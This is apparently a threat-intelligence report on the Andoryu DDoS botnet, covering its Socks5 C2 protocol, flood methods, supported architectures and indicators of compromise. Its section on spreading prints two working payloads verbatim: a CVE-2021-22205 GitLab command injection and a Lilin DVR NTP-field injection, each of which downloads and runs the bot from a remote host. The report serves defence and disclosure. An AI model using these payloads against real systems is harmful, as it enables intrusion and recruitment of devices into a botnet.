1. Overview
In early February 2023, the Threat Monitoring System of QiAnXin Threat Intelligence Center found that some malware family propagated by exploiting CVE-2021-22205 vulnerability. Through analysis it can be confirmed that the malware didn’t belong to any known botnet family.
We refer to this new botnet as “Andoryu Botnet” according to the name used by its creator. This botnet malware communicates with C2 server via Socks5 protocol.
Recent spreading trend of Andoryu Botnet is as follows. From the timeline of activity, we found that Andoryu Botnet only spreads around the time when it was updated as well as in a small area, which indicates that the botnet is still in development.
2. Analysis of Behaviors
This article uses the x86-64 version of Andoryu Botnet as an example for analysis, and the sample information is as follows :
| - | - | - |
|---|---|---|
| File name | File Size | MD5 |
| Andoryu.x86 | 42208 bytes | D203E1BB0BA3E8385FF9E1F83C10EB2D |
2.1 Check of Startup Parameters
First thing that Andoryu does is to check its startup parameters. When there is a parameter, the malware will run normally.
2.2 String Encryption
Most of the important strings used by the malware are encrypted, and these encrypted strings are decrypted in bulk by a function at the early stage of running.
2.3 Process Name Disguise
Use the prctl function to change the process name to “/bin/bash”.
2.4 Printing Botnet Information
Decrypted strings contains the botnet information which will be printed to the console when malware running.
Therefore this botnet is named as Andoryu Botnet, and it is shown that the creator tested the malware on December 30, 2022.
3. Socks5 Communication
3.1 Communication Process
The botnet communicates with C2 server through Socks protocol, and the specific communication process is as follows:
(1) Firstly, it connect to the hard-coded proxy server with the address "152.67.66.37:1080".
(2) After three successful handshakes with the proxy server, it starts Socks authentication. The Socks5 proxy uses no user password authentication.
(3) Then the malware tells the proxy server the address of remote server to be accessed. The address is also obtained when strings decrypted in bulk. (DST_C2 = "172.86.123.20:1025")
(4) Next it starts Socks communication and sends a beacon packet which includes local IP information of the infected host.
(5) The malware receives commands from C2 server via proxy.
QiAnXin Threat Intelligence Center has already monitored the downstream data, but the attacker has not send any DDoS attack instruction yet. We will continue to trace Andoryu Botnet and report its latest activity.
3.2 DDoS Methods
AndoryuBot supports a variety of DDoS methods, as follows:
| - | - |
|---|---|
| Name | Description |
| icmp-echo | ICMP Flood |
| udp-ovh | UDP Flood for OVH |
| udp-game | UDP Game Flood |
| udp-plain | UDP Plain Flood |
| tcp-raw | TCP Flood |
| tcp-socket | TCP Syn Flood |
| tcp-handshake | TCP Flood |
4. Update and Dissemination
Through correlation analysis of the discovered samples, update of Andoryu Botnet began in December 2022. After that two updates are seen in the malware. Its creator didn’t modify the time string which is print in console, while updates mainly focused on remote server address (DST_C2) and supported architectures. The CPU architectures supported by the latest version of AndoryuBot are as follows.
- Arm
- Mips
- M68K
- SuperH
- Sparc
- x86
Andoryu Botnet spreads through Lilin DVR RCE as well as CVE-2021-22205, and the payload found this time is as follows.
CVE-2021-22205:
P(metadata
.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . \" b ") )
Lilin DVR RCE:
User-Agent: Abcd
<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" Server="time.nist.gov&cd /tmp;wget -O- http://47.87.154.192/lillin|sh;echo DONE"/></Service></DVR>]]></SetConfiguration></DVR>
5. IoCs
MD5:
D203E1BB0BA3E8385FF9E1F83C10EB2D
28F10E60D05018E6D28B79F0976A8542
F9018E4401116435DCFE2DC9D14D0FD5
2BABAF24B23872749EEC1452D7E7C0F3
ABD2496C3B703BD722386A848CC0BC12
6335ECB85ED6C6FCCF71FD841939BEC4
70A568C47785A8C58AA1D755EFE0E39E
FFE05160D769F441EF4A67271F9E614C
BB7DECCC2F6CEB2D5A5C7F5A05A4BBB1
0A1B14C2B8A453323841431FA44D0E32
C9CE8E0A1B13CBB6719133AFE5988CA7
C&C:
152.67.66.37:1080
172.86.123.20: 1025
104.234.239.190:1025